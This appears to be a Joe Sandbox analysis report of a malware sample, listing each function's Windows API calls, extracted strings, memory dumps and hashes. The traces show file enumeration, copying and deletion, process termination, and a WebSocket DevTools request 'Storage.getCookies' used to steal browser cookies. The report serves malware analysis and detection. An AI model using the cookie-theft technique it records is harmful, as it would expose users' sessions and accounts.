                              • Opcode Fuzzy Hash: 50790a68bb7f89518099d285142ea6c250e52b417aa2ff21c50d9c0773fa5608
                              • Instruction Fuzzy Hash: BBC16371900219AFCF54EF64DC49EEE7B79FF89700F048598F50997290EA34AA85CB61
                              Function 005AE330 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 213stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 005AE353
                              • FindFirstFileA.KERNEL32(?,?), ref: 005AE369
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005AE388
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005AE3A0
                              • wsprintfA.USER32 ref: 005AE3C7
                              • StrCmpCA.SHLWAPI(?,005BD014), ref: 005AE3DC
                              • wsprintfA.USER32 ref: 005AE3F8
                                • Part of subcall function 005AEF30: lstrcpy.KERNEL32(00000000,?), ref: 005AEF62
                              • wsprintfA.USER32 ref: 005AE416
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 005AE42B
                              • lstrcat.KERNEL32(?,0160EEF0), ref: 005AE460
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AE473
                              • lstrcat.KERNEL32(?,?), ref: 005AE488
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AE49B
                              • lstrcat.KERNEL32(?,?), ref: 005AE4B1
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 005AE4C6
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE4FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE553
                              • DeleteFileA.KERNEL32(?), ref: 005AE594
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005AE5D9
                              • FindClose.KERNEL32(00000000), ref: 005AE5E8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                              • String ID: %s\%s$%s\*
                              • API String ID: 1375681507-2848263008
                              • Opcode ID: deb2dc380dc8a3d23b4586fe47d0bccdc5fa5e76fa38abf6958b55a268bc6329
                              • Instruction ID: 79888cc6c8447ee4e66d5132228755f9a0f85c85ef41ae533e9fe04f5d9a9982
                              • Opcode Fuzzy Hash: deb2dc380dc8a3d23b4586fe47d0bccdc5fa5e76fa38abf6958b55a268bc6329
                              • Instruction Fuzzy Hash: D4816F715143459BCB60EFB4DC89EDF7BA9BFC8700F00891DB58987151EA34E9488BA6
                              Function 005915B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005915E2
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591619
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059166C
                              • lstrcat.KERNEL32(00000000), ref: 00591676
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005916A2
                              • lstrcpy.KERNEL32(00000000,?), ref: 005917F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005917FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat
                              • String ID: \*.*
                              • API String ID: 2276651480-1173974218
                              • Opcode ID: f6189f634bbd57de190fa2eef98967c24024fec34f90d29db2af29616eb128fc
                              • Instruction ID: 3ee9b536e29f425f90944cd737c55fa1e1eb9c6b039f62225d62468288d7c39c
                              • Opcode Fuzzy Hash: f6189f634bbd57de190fa2eef98967c24024fec34f90d29db2af29616eb128fc
                              • Instruction Fuzzy Hash: 6B813F7191262BABCF11EF64C98DAAE7FB4FF44700F184128F905A7251DB349D41CBA5
                              Function 005ADE50 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 170stringfilememoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005ADE68
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005ADE6F
                              • wsprintfA.USER32 ref: 005ADE87
                              • FindFirstFileA.KERNEL32(?,?), ref: 005ADEA0
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005ADEBE
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005ADED9
                              • wsprintfA.USER32 ref: 005ADEF9
                              • DeleteFileA.KERNEL32(?), ref: 005ADF4D
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 005ADF14
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                                • Part of subcall function 005ADAA0: memset.MSVCRT ref: 005ADAC1
                                • Part of subcall function 005ADAA0: memset.MSVCRT ref: 005ADAD3
                                • Part of subcall function 005ADAA0: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005ADAFB
                                • Part of subcall function 005ADAA0: lstrcpy.KERNEL32(00000000,?), ref: 005ADB2E
                                • Part of subcall function 005ADAA0: lstrcat.KERNEL32(?,00000000), ref: 005ADB3C
                                • Part of subcall function 005ADAA0: lstrcat.KERNEL32(?,0160E838), ref: 005ADB56
                                • Part of subcall function 005ADAA0: lstrcat.KERNEL32(?,?), ref: 005ADB6A
                                • Part of subcall function 005ADAA0: lstrcat.KERNEL32(?,0160DB88), ref: 005ADB7E
                                • Part of subcall function 005ADAA0: lstrcpy.KERNEL32(00000000,?), ref: 005ADBAE
                                • Part of subcall function 005ADAA0: GetFileAttributesA.KERNEL32(00000000), ref: 005ADBB5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005ADF5C
                              • FindClose.KERNEL32(00000000), ref: 005ADF6B
                              • lstrcat.KERNEL32(?,0160EEF0), ref: 005ADF92
                              • lstrcat.KERNEL32(?,0160DCE0), ref: 005ADFA4
                              • lstrlen.KERNEL32(?), ref: 005ADFAF
                              • lstrlen.KERNEL32(?), ref: 005ADFBE
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ADFF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                              • String ID: %s\%s$%s\*
                              • API String ID: 4184593125-2848263008
                              • Opcode ID: 565dd35a2e3d616751d3841b3a1c3f0e3789089a8031f085332a4b8e37b0b06a
                              • Instruction ID: 87e3d020137f1c547b0ebd7738e728ec5675a5fd56c4bb801ed01afa903bb6c5
                              • Opcode Fuzzy Hash: 565dd35a2e3d616751d3841b3a1c3f0e3789089a8031f085332a4b8e37b0b06a
                              • Instruction Fuzzy Hash: AA515D71514345AFC760EF74D849E9F7BE9BBC8301F00892DF99A87250EB34E9448B96
                              Function 005AD640 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 005AD65D
                              • FindFirstFileA.KERNEL32(?,?), ref: 005AD674
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005AD694
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005AD6AE
                              • lstrcat.KERNEL32(?,0160EEF0), ref: 005AD6F3
                              • lstrcat.KERNEL32(?,0160EE70), ref: 005AD707
                              • lstrcat.KERNEL32(?,?), ref: 005AD71B
                              • lstrcat.KERNEL32(?,?), ref: 005AD72C
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AD73E
                              • lstrcat.KERNEL32(?,?), ref: 005AD752
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AD792
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AD7E2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005AD847
                              • FindClose.KERNEL32(00000000), ref: 005AD856
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 50252434-4073750446
                              • Opcode ID: 3940730a759f65ace5f5a826e4e48cfc22e3ea5f1398c2dff908b2f6a064fe6e
                              • Instruction ID: 585c7031b0cb9b656ce8cceab37f62f9eb716462d0dc0dc11cc2d14c3aa50ca5
                              • Opcode Fuzzy Hash: 3940730a759f65ace5f5a826e4e48cfc22e3ea5f1398c2dff908b2f6a064fe6e
                              • Instruction Fuzzy Hash: F361657591021AAFCF54EF74CC89ADE7BB8FF48300F0084A9E64993251DB34AA85CF90
                              Function 00599876 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 175stringsleepCOMMON
                              Download Yara Rule
                              APIs
                              • CreateDesktopA.USER32(?), ref: 00599888
                              • lstrcat.KERNEL32(?,?), ref: 005998BB
                              • lstrcat.KERNEL32(?,?), ref: 005998CD
                              • lstrcat.KERNEL32(?,005C5128), ref: 005998DD
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0059991A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00599950
                              • StrStrA.SHLWAPI(?,0160E5F8), ref: 00599965
                              • lstrcpyn.KERNEL32(007C93D0,?,00000000), ref: 00599982
                              • lstrlen.KERNEL32(?), ref: 00599996
                              • wsprintfA.USER32 ref: 005999A6
                              • lstrcpy.KERNEL32(?,?), ref: 005999BD
                              • Sleep.KERNEL32(00001388), ref: 00599A41
                              • CloseDesktop.USER32(?), ref: 00599A81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Desktoplstrcpy$CloseCreateFolderPathSleeplstrcpynlstrlenwsprintf
                              • String ID: %s%s$D
                              • API String ID: 649207557-433275411
                              • Opcode ID: 0c273119e8071dc55cb3585616c6c640e2940b0f60f1312722668465cf40274b
                              • Instruction ID: e7bb251d7fcec3f80ddff047c6ee9d30dc0d648f118b0362d4f375490f1e47a8
                              • Opcode Fuzzy Hash: 0c273119e8071dc55cb3585616c6c640e2940b0f60f1312722668465cf40274b
                              • Instruction Fuzzy Hash: B9616F71214345AFD760EF64DC49FAF7BE8FF88700F00891DB6898B191DB74A9448BA6
                              Function 005B48D0 Relevance: 19.1, APIs: 4, Strings: 8, Instructions: 1129COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$hU\$hU\$ws://${"id":1,"method":"Storage.getCookies"}
                              • API String ID: 909987262-1727676772
                              • Opcode ID: 13f1c3418a3bd9d55fd7863956cddf81e00047daf53e283fc87b10fa9e472489
                              • Instruction ID: f955e725e68b5955e919eadff38e3340aff1008e9be7e54c1f110a0131834032
                              • Opcode Fuzzy Hash: 13f1c3418a3bd9d55fd7863956cddf81e00047daf53e283fc87b10fa9e472489
                              • Instruction Fuzzy Hash: 55A25A71D012599FDF24DFA8C8807EDBBB6BF88300F1481AAD509A7241EB716E85CF91
                              Function 005A2749 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A2774
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2797
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A27A2
                              • lstrlen.KERNEL32(\*.*), ref: 005A27AD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A27CA
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 005A27D6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A280A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A2826
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: 192668339bbee4bf184f22fd339f0906bd27184d793ae2d48ef6e92e841c3426
                              • Instruction ID: df390f9afa16d8a5feeed2c7f976187a49d9e82a88e8c7a8ba7c8d019c89bb50
                              • Opcode Fuzzy Hash: 192668339bbee4bf184f22fd339f0906bd27184d793ae2d48ef6e92e841c3426
                              • Instruction Fuzzy Hash: 93411F3151261BABCF21EF68DC8EA9E7FA4FF85710F044128B94997262DB34DD458B90
                              Function 005B46C0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005B46D9
                              • Process32First.KERNEL32(00000000,00000128), ref: 005B46E9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B46FB
                              • StrCmpCA.SHLWAPI(?), ref: 005B470D
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005B4722
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 005B4731
                              • CloseHandle.KERNEL32(00000000), ref: 005B4738
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B4746
                              • CloseHandle.KERNEL32(00000000), ref: 005B4751
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: e378098eb625613d40e11efb6c35f6054e460c3eb8510b0805730a1f9903d351
                              • Instruction ID: 3ba004dded0ae5cd895291129f6b44859e6c4f009dcfcc66fb49153ab79c7fac
                              • Opcode Fuzzy Hash: e378098eb625613d40e11efb6c35f6054e460c3eb8510b0805730a1f9903d351
                              • Instruction Fuzzy Hash: 6701AD32601125ABE7605B209C8CFFA3B7CFB49B01F00408CFA0595180EF78A982CBA9
                              Function 0094F02F Relevance: 12.9, Strings: 9, Instructions: 1666COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
